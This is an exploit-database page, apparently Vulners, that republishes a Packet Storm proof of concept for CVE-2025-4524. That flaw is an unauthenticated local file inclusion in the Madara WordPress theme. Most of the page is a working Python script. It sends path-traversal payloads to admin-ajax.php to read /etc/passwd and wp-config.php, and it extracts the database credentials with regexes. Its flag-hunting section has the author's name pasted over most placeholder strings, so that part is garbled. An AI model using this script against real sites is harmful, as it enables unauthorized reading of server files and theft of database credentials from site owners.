Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 WordPress Madera 2.2.2 Local File Inclusion

🗓️ 11 May 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 56 Views

Madara 2.2.2 Local File Inclusion exploit via admin-ajax to read server files (CVE-2025-4524).

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for CVE-2025-4524
5 May 202503:28
githubexploit
GithubExploit		Exploit for Authentication Bypass Using an Alternate Path or Channel in Gitlab
13 Jun 202617:04
githubexploit
Circl		CVE-2025-4524
20 May 202523:11
circl
CNNVD		WordPress plugin Madara 路径遍历漏洞
21 May 202500:00
cnnvd
CVE		CVE-2025-4524
21 May 202506:39
cve
Cvelist		CVE-2025-4524 Madara – Responsive and modern WordPress theme for manga sites <= 2.2.2 - Unauthenticated Local File Inclusion
21 May 202506:39
cvelist
Exploit DB		WordPress Madara - Local File Inclusion
6 Apr 202600:00
exploitdb
EUVD		EUVD-2025-15990
3 Oct 202520:07
euvd
EUVD		EUVD-2025-15991
3 Oct 202520:07
euvd
Nuclei		WordPress Madara Theme < 2.2.2.1 - Local File Inclusion
25 Jun 202605:45
nuclei
Rows per page
==================================================================================================================================
    | # Title     : WordPress Madera 2.2.2 Local File Inclusion Exploit                                                              |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://mangabooth.com/product/wp-manga-theme-madara/                                                            |
    ==================================================================================================================================
    
    [+] Summary    : This Python script exploits a Local File Inclusion (CVE-2025-4524) vulnerability in the WordPress Madara theme. 
                     It interacts with the admin-ajax.php endpoint to load sensitive files from the server, potentially leading to the exposure of system or application data.
    
    [+] POC        :  
    
    import requests
    import sys
    import re
    
    class MadaraLFIExploit:
        def __init__(self, target):
            self.target = target.rstrip('/')
            self.ajax_url = f"{self.target}/wp-admin/admin-ajax.php"
            self.session = requests.Session()
            
        def read_file(self, filepath):
            """
          Reading a file via LFI filepath: The file path (e.g., /etc/passwd or ../../wp-config.php)
            """
    
            payload = {
                'action': 'madara_load_more',
                'page': '1',
                'template': f'plugins/../../../../../../..{filepath}',
                'vars[orderby]': 'meta_value_num',
                'vars[paged]': '1',
                'vars[timerange]': '',
                'vars[posts_per_page]': '16',
                'vars[tax_query][relation]': 'OR',
                'vars[meta_query][0][relation]': 'AND',
                'vars[meta_query][relation]': 'AND',
                'vars[post_type]': 'wp-manga',
                'vars[post_status]': 'publish',
                'vars[meta_key]': '_latest_update',
                'vars[order]': 'desc',
                'vars[sidebar]': 'right',
                'vars[manga_archives_item_layout]': 'big_thumbnail'
            }
            
            headers = {
                'User-Agent': 'Mozilla/5.0 (indoushka; rv:128.0) Gecko/20100101 Firefox/128.0',
                'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
                'X-Requested-With': 'XMLHttpRequest'
            }
            
            try:
                response = self.session.post(
                    self.ajax_url,
                    data=payload,
                    headers=headers,
                    timeout=10
                )
    
                if response.status_code == 200 and len(response.text) > 50:
                    return response.text
                else:
                    return None
                    
            except Exception as e:
                print(f"[-] Error: {e}")
                return None
        
        def read_config_file(self):
            """Read wp-config.php (contains database credentials)"""
    
            paths = [
                '/wp-config.php',
                '/../wp-config.php',
                '../../wp-config.php',
                '../../../wp-config.php'
            ]
            
            for path in paths:
                print(f"[*] Trying: {path}")
                content = self.read_file(path)
                if content and 'DB_NAME' in content and 'DB_PASSWORD' in content:
                    print("[+] Found wp-config.php!")
                    db_patterns = {
                        'DB_NAME': r"define\s*\(\s*'DB_NAME'\s*,\s*'([^']+)'",
                        'DB_USER': r"define\s*\(\s*'DB_USER'\s*,\s*'([^']+)'",
                        'DB_PASSWORD': r"define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'",
                        'DB_HOST': r"define\s*\(\s*'DB_HOST'\s*,\s*'([^']+)'"
                    }
                    
                    for key, pattern in db_patterns.items():
                        match = re.search(pattern, content)
                        if match:
                            print(f"[+] {key}: {match.group(1)}")
                    
                    return content
            
            return None
        
        def find_indoushka(self):
            """Searching for indoushkas in popular files"""
            common_files = [
                '/indoushka.txt',
                '/root/indoushka.txt',
                '/home/indoushka/indoushka.txt',
                '/var/www/indoushka.txt',
                '/tmp/indoushka.txt',
                '../../../indoushka.txt',
                '../../../../indoushka.txt'
            ]
            
            for filepath in common_files:
                print(f"[*] Checking {filepath}")
                content = self.read_file(filepath)
                if content:
    
                    patterns = [
                        r'indoushka\{[^}]+\}',
                        r'indoushka\{[^}]+\}',
                        r'indoushka\{[^}]+\}',
                        r'\{FLG:[^}]+\}',
                        r'[A-Z0-9]{32,}',
                        r'[a-f0-9]{32,}'
                    ]
                    
                    for pattern in patterns:
                        matches = re.findall(pattern, content)
                        if matches:
                            print(f"[YEP] indoushka FOUND: {matches[0]}")
                            return matches[0]
            print("[*] Trying to read sensitive WordPress files...")
            wp_files = [
                '/wp-config.php',
                '/wp-content/plugins/madara/functions.php',
                '/wp-content/themes/madara/style.css'
            ]
            
            for wp_file in wp_files:
                content = self.read_file(wp_file)
                if content and ('indoushka' in content.lower() or 'indoushka' in content.lower()):
                    print(f"[+] Interesting content in {wp_file}:")
                    print(content[:500])
            
            return None
    if __name__ == "__main__":
        target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"
        
        exploit = MadaraLFIExploit(target)
        
        print("[*] Testing LFI vulnerability...")
        test_content = exploit.read_file('/etc/passwd')
        
        if test_content and 'root:' in test_content:
            print("[+] LFI confirmed! /etc/passwd read successfully")
            print("\n[*] Searching for indoushka...")
            indoushka = exploit.find_indoushka()
            
            if not indoushka:
                print("[*] Trying to read database config...")
                exploit.read_config_file()
        else:
            print("[-] LFI might not work. Trying alternative payload...")
    
            test_content = exploit.read_file('../../../wp-config.php')
            if test_content and 'DB_NAME' in test_content:
                print("[+] LFI confirmed via wp-config.php!")
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 May 2026 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.09094
SSVC
Madara 2.2.2Local File Inclusionadmin-ajax endpointCVE 2025 4524read server files
56